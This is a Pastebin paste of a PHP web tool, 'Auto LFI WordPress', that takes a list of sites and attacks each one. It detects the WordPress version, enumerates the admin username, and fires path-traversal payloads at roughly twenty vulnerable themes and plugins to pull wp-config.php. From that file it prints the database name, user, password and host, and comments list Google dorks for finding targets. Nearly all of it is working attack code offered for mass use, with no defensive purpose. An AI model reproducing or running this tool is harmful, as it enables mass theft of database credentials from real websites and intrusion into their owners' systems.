API tools faq
paste
Advertisement
DrsMalware

AUTO Exploit LFI WordPress 4.2.7

DrsMalware
Feb 27th, 2016
1,442
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.71 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2. <title>Auto LFI | Drs.Malware </Title>
  3. <body>
  4. <body style="background-color:#2980b9">
  5. <pre><center>
  6. <br>Auto LFI | Drs.Malware</br>
  7. <img src="https://lh3.googleusercontent.com/-8HHgMgxIgyA/VtEDio6PwaI/AAAAAAAAAF4/teVXCOj3ex0/h120/logo-pinkcube-nieuw-kubus.png" alt="CyberDB" style="width:128px;height:128px;">
  8. <br>Code By DRS.Malware </br>
  9. <br>Dont Forget Visit www.cyber-db.id </br>
  10. <form method='POST'>
  11. <textarea name='sites' cols='45' rows='15'></textarea>
  12. _______________________________________________________________
  13. </br><input type='submit' value='SANTAP NJENG!' /><br>
  14. </form>
  15.  
  16.  
  17. <?php
  18.  
  19. @set_time_limit(0);
  20.  
  21.  
  22. $sites = explode("\r\n", $_POST['sites']);
  23.  
  24. foreach($sites as $site) {
  25.  
  26. $site = trim($site);
  27.  
  28. $ch = curl_init();
  29. curl_setopt($ch, CURLOPT_URL, "$site");
  30. curl_setopt($ch, CURLOPT_HEADER, 1);
  31. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  32. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  33. $get = curl_exec($ch);
  34. curl_close($ch);
  35. if(preg_match("#WordPress (.*?)/>#", $get, $version)){
  36. $str = str_replace('/>', "", $version[0]);
  37. $str = str_replace('"', "", $str);
  38.  
  39. $users = @file_get_contents("$site/?author=1");
  40. preg_match('/<title>(.*?)<\/title>/si',$users,$user);
  41. $wpuser = explode('|',$user[1]);
  42. echo " <br>_______________________________________________________________</br>";
  43. echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version : ".$str."<br>"; }
  44.  
  45. # Dork Google: revslider.php "index of"
  46. # inurl:wp-content/themes/antioch
  47. # inurl:wp-content/themes/authentic
  48.  
  49.  
  50. $expl = array("wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php","wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php","wp-content/themes/urbancity/lib/scripts/download.php?file=wp-config.php","wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php","wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php","wp-content/force-download.php?file=../wp-config.php","wp-content/themes/lote27/download.php?download=../../../wp-config.php","wp-content/plugins/wp-custom-pages/wp-download.php?download=../../../wp-config.php");
  51. foreach($expl as $exploit){
  52. $ch = curl_init();
  53. curl_setopt($ch, CURLOPT_URL, "$site/$exploit");
  54. curl_setopt($ch, CURLOPT_HTTPGET, 1);
  55. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  56. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  57. $xp = curl_exec ($ch);
  58. curl_close($ch);
  59. if(preg_match("#DB_USER#i",$xp)){
  60. preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
  61. echo "DB_NAME:{$DB_NAME[1]}<br>";
  62. preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
  63. echo "DB_USER:{$DB_USER[1]}<br>";
  64. preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
  65. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  66. preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
  67. echo "DB_HOST:{$DB_HOST[1]}<br>";
  68.  
  69. }}
  70.  
  71. $lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php","wp-content/themes/dejavu/lib/scripts/dl-skin.php");
  72. foreach($lt as $l){
  73. $site = "$site/$l";
  74. $process = curl_init($site);
  75. curl_setopt($process, CURLOPT_TIMEOUT, 30);
  76. curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
  77. curl_setopt($process, CURLOPT_HEADER, TRUE);
  78. curl_setopt($process, CURLOPT_POST, 1);
  79. curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php");
  80. curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
  81. curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
  82. $return = curl_exec($process);
  83. if(preg_match("#DB_USER#i",$return)){
  84. preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
  85. echo "DB_NAME:{$DB_NAME[1]}<br>";
  86. preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
  87. echo "DB_USER:{$DB_USER[1]}<br>";
  88. preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
  89. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  90. preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
  91. echo "DB_HOST:{$DB_HOST[1]}<br>";
  92. break;
  93. echo " <br>_______________________________________________________________</br>";
  94.  
  95. }
  96. }
  97. }
  98.  
  99. ?>
  100. </html>
  101. </body>
  102. </pre></center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!